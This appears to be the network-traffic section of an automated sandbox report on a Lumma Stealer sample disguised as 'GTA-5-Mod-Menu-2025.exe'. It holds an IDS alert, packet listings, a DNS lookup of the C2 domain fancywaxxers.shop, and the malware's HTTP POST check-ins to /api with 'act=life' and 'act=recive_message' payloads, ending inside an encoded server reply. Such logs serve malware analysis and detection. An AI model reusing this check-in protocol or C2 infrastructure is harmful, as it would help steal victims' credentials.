                                                                  2024-12-30T20:41:11.080134+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649728104.21.96.1443TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 30, 2024 20:40:57.967700958 CET49705443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:57.967746973 CET44349705104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:40:57.967817068 CET49705443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:57.993355989 CET49705443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:57.993387938 CET44349705104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:40:58.501733065 CET44349705104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:40:58.501835108 CET49705443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:58.508624077 CET49705443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:58.508641005 CET44349705104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:40:58.508944035 CET44349705104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:40:58.557790995 CET49705443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:58.561202049 CET49705443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:58.561242104 CET49705443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:58.561309099 CET44349705104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:40:58.976809025 CET44349705104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:40:58.976897955 CET44349705104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:40:58.977001905 CET49705443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:58.978992939 CET49705443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:58.979001999 CET44349705104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:40:58.979020119 CET49705443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:58.979028940 CET44349705104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:40:58.997263908 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:58.997298956 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:40:58.997378111 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:58.997720957 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:58.997733116 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:40:59.471405029 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:40:59.471486092 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:59.473465919 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:59.473478079 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:40:59.473733902 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:40:59.475121975 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:59.475155115 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:40:59.475191116 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.222165108 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.222235918 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.222268105 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.222289085 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:00.222310066 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.222347975 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.222352028 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:00.222357988 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.222397089 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.222399950 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:00.222430944 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.222476006 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:00.222830057 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.226825953 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.226860046 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.226877928 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:00.226886034 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.226932049 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:00.330408096 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.330462933 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.330523968 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:00.330534935 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.330552101 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.330595016 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:00.331063032 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:00.331077099 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.331103086 CET49706443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:00.331130028 CET44349706104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.549524069 CET49707443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:00.549556971 CET44349707104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:00.549618006 CET49707443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:00.550287962 CET49707443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:00.550302982 CET44349707104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:01.036508083 CET44349707104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:01.036591053 CET49707443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:01.085710049 CET49707443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:01.085731030 CET44349707104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:01.086051941 CET44349707104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:01.129775047 CET49707443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:01.148863077 CET49707443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:01.148912907 CET44349707104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:01.736769915 CET44349707104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:01.736864090 CET44349707104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:01.737056017 CET49707443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:01.737158060 CET49707443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:01.737173080 CET44349707104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:01.869299889 CET49708443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:01.869340897 CET44349708104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:01.869431019 CET49708443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:01.869796038 CET49708443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:01.869811058 CET44349708104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:02.335150003 CET44349708104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:02.335242987 CET49708443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:02.336582899 CET49708443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:02.336591005 CET44349708104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:02.336843967 CET44349708104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:02.338184118 CET49708443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:02.338344097 CET49708443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:02.338376999 CET44349708104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:02.338428020 CET49708443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:02.383338928 CET44349708104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:02.826580048 CET44349708104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:02.826668024 CET44349708104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:02.826730967 CET49708443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:02.826895952 CET49708443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:02.826904058 CET44349708104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:03.019201040 CET49709443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:03.019224882 CET44349709104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:03.019288063 CET49709443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:03.019625902 CET49709443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:03.019638062 CET44349709104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:03.475584030 CET44349709104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:03.475677967 CET49709443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:03.478055000 CET49709443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:03.478060961 CET44349709104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:03.478305101 CET44349709104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:03.526578903 CET49709443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:03.570506096 CET49709443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:03.570672989 CET49709443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:03.570694923 CET44349709104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:03.570770025 CET49709443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:03.570775986 CET44349709104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:04.195075989 CET44349709104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:04.195168018 CET44349709104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:04.195239067 CET49709443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:04.195441008 CET49709443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:04.195452929 CET44349709104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:04.667855024 CET49710443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:04.667880058 CET44349710104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:04.667953968 CET49710443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:04.668363094 CET49710443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:04.668378115 CET44349710104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:05.142685890 CET44349710104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:05.142811060 CET49710443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:05.144494057 CET49710443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:05.144504070 CET44349710104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:05.144769907 CET44349710104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:05.146132946 CET49710443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:05.146240950 CET49710443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:05.146248102 CET44349710104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:07.345124960 CET44349710104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:07.345233917 CET44349710104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:07.345290899 CET49710443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:07.345539093 CET49710443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:07.345550060 CET44349710104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:07.878645897 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:07.878669977 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:07.878736973 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:07.879101992 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:07.879112959 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:08.394697905 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:08.394829988 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.396287918 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.396295071 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:08.396543026 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:08.397914886 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.398691893 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.398731947 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:08.399113894 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.399157047 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:08.399264097 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.399288893 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:08.399399996 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.399420023 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:08.399568081 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.399595022 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:08.399732113 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.399768114 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.408046007 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:08.408185959 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.408216000 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:08.408233881 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.408350945 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.408385992 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.409312010 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:08.409528017 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.409549952 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:08.409565926 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.409598112 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.409641981 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:08.414410114 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:10.150707006 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:10.150790930 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:10.150928020 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:10.151221991 CET49712443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:10.151233912 CET44349712104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:10.167701960 CET49728443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:10.167720079 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:10.167793036 CET49728443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:10.168066978 CET49728443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:10.168080091 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:10.623967886 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:10.624047041 CET49728443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:10.625588894 CET49728443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:10.625597000 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:10.625834942 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:10.629113913 CET49728443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:10.629153013 CET49728443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:10.629189014 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:11.080161095 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:11.080209970 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:11.080241919 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:11.080260038 CET49728443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:11.080272913 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:11.080316067 CET49728443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:11.080322027 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:11.080429077 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:11.080466032 CET49728443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:11.080472946 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:11.080852985 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:11.080883026 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:11.080893993 CET49728443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:11.080904007 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:11.080943108 CET49728443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:11.084852934 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:11.084937096 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:11.084985018 CET49728443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:11.183979988 CET49728443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:11.183993101 CET44349728104.21.96.1192.168.2.6
                                                                  Dec 30, 2024 20:41:11.184005976 CET49728443192.168.2.6104.21.96.1
                                                                  Dec 30, 2024 20:41:11.184010983 CET44349728104.21.96.1192.168.2.6
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 30, 2024 20:40:57.951416969 CET5602253192.168.2.61.1.1.1
                                                                  Dec 30, 2024 20:40:57.962029934 CET53560221.1.1.1192.168.2.6
                                                                  Dec 30, 2024 20:41:16.536076069 CET53547101.1.1.1192.168.2.6
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 30, 2024 20:40:57.951416969 CET192.168.2.61.1.1.10x2ed6Standard query (0)fancywaxxers.shopA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 30, 2024 20:40:57.962029934 CET1.1.1.1192.168.2.60x2ed6No error (0)fancywaxxers.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 20:40:57.962029934 CET1.1.1.1192.168.2.60x2ed6No error (0)fancywaxxers.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 20:40:57.962029934 CET1.1.1.1192.168.2.60x2ed6No error (0)fancywaxxers.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 20:40:57.962029934 CET1.1.1.1192.168.2.60x2ed6No error (0)fancywaxxers.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 20:40:57.962029934 CET1.1.1.1192.168.2.60x2ed6No error (0)fancywaxxers.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 20:40:57.962029934 CET1.1.1.1192.168.2.60x2ed6No error (0)fancywaxxers.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                  Dec 30, 2024 20:40:57.962029934 CET1.1.1.1192.168.2.60x2ed6No error (0)fancywaxxers.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                  • fancywaxxers.shop
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.649705104.21.96.14436216C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 19:40:58 UTC264OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 8
                                                                  Host: fancywaxxers.shop
                                                                  2024-12-30 19:40:58 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                  Data Ascii: act=life
                                                                  2024-12-30 19:40:58 UTC1133INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 19:40:58 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=0jnpm3jo8u08quuklr5irbskdq; expires=Fri, 25 Apr 2025 13:27:37 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wUDQ9Z1s40Zjl6%2BqDm88eGOGZRsdPwaEF%2B1WY82BOBAM3ltObqmAjdv%2FklJIvpfP4Ash%2BHxrunFA1fn%2FFGAtY4mReSsYBvDaMS7r4G98NL3CgosrwA75NrI5UBUlEUhxCaSBJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa481325bb3c32e-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1653&rtt_var=633&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1710603&cwnd=178&unsent_bytes=0&cid=cc545b2c8fc2a677&ts=489&x=0"
                                                                  2024-12-30 19:40:58 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                  Data Ascii: 2ok
                                                                  2024-12-30 19:40:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.649706104.21.96.14436216C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 19:40:59 UTC265OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 51
                                                                  Host: fancywaxxers.shop
                                                                  2024-12-30 19:40:59 UTC51OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 26 6a 3d
                                                                  Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--899083440&j=
                                                                  2024-12-30 19:41:00 UTC1128INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 19:41:00 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=cupuc5nkuqm30vkpc0b4le7vtm; expires=Fri, 25 Apr 2025 13:27:38 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8I8oor%2FjBcE72e5y1qi2WEEKoRQTmflAupqlCzdUiSxVQOSmHMFV15GzWEvAtgwIhC61wI89zTMv4kZG4agI%2F4w4KUDZej8OVhfcw107VrwXbpfyBm8qGQ0P32WFKMbBRVn0qQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa4813858d54363-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5529&min_rtt=1658&rtt_var=3084&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=952&delivery_rate=1761158&cwnd=238&unsent_bytes=0&cid=3bf828673de3aa33&ts=760&x=0"
                                                                  2024-12-30 19:41:00 UTC241INData Raw: 34 36 36 0d 0a 65 33 79 75 59 75 6f 36 41 68 43 4a 4a 6d 66 5a 72 42 59 54 2b 38 2b 5a 74 71 44 31 6c 54 72 45 65 75 5a 44 6f 74 35 52 32 46 77 41 58 74 68 41 30 41 34 75 4d 76 70 44 52 65 50 59 5a 47 61 65 34 37 76 58 78 4e 65 76 58 4b 55 57 6c 53 61 4f 2f 43 65 31 66 6b 45 61 7a 77 36 5a 58 79 34 79 37 46 35 46 34 2f 64 74 4d 5a 36 68 75 34 79 43 6b 50 39 59 70 52 61 45 49 73 6d 78 49 62 51 2f 45 78 44 4a 43 6f 39 5a 5a 6e 48 6c 53 77 4b 38 79 58 64 35 6c 61 62 30 33 73 33 58 75 52 69 68 41 4d 52 35 67 4a 4d 30 72 44 30 32 48 64 30 4a 79 45 63 75 61 36 74 44 43 66 75 57 4e 48 4b 65 72 66 58 51 78 4a 37 39 55 71 77 65 68 53 66 49 72 6a 69 2b 4e 42 4d 65 79 67 75 46 55 48 4a 38 37 30 77 4a 75 73 4e 33 4d 64 66 74
                                                                  Data Ascii: 466e3yuYuo6AhCJJmfZrBYT+8+ZtqD1lTrEeuZDot5R2FwAXthA0A4uMvpDRePYZGae47vXxNevXKUWlSaO/Ce1fkEazw6ZXy4y7F5F4/dtMZ6hu4yCkP9YpRaEIsmxIbQ/ExDJCo9ZZnHlSwK8yXd5lab03s3XuRihAMR5gJM0rD02Hd0JyEcua6tDCfuWNHKerfXQxJ79UqwehSfIrji+NBMeyguFUHJ870wJusN3Mdft
                                                                  2024-12-30 19:41:00 UTC892INData Raw: 2f 4d 79 43 7a 37 63 4c 6c 42 75 56 4d 4e 57 78 49 37 78 2b 42 6c 44 56 51 49 39 55 49 43 71 72 54 41 6d 31 79 33 64 2b 6e 71 7a 37 78 73 32 58 39 46 43 75 48 49 34 75 7a 37 4d 39 73 44 6b 52 46 38 73 50 6a 31 42 6d 66 65 67 45 53 2f 76 4a 62 44 48 42 37 64 76 45 77 5a 54 6a 56 62 64 59 6d 32 2f 5a 2f 44 53 32 66 6b 46 65 79 67 36 4a 56 57 42 67 34 30 38 4f 76 74 78 2f 65 4a 53 67 2b 39 6e 49 6d 50 52 59 6f 52 4b 4f 4c 73 71 34 50 72 63 34 47 52 36 4d 54 73 68 66 65 44 4b 7a 42 43 61 2b 33 6e 4e 39 6a 2b 2f 42 6c 4e 33 5a 37 68 69 68 46 4d 52 35 67 4c 51 32 75 54 30 53 45 63 38 49 67 30 70 67 59 4f 31 4a 41 4b 6e 49 63 58 2b 54 72 75 6e 65 7a 4a 48 30 55 61 30 52 67 53 62 45 2f 48 33 36 4f 51 46 65 6c 45 43 70 56 57 74 2b 34 56 4d 46 2b 39 45 36 61 4e 6d
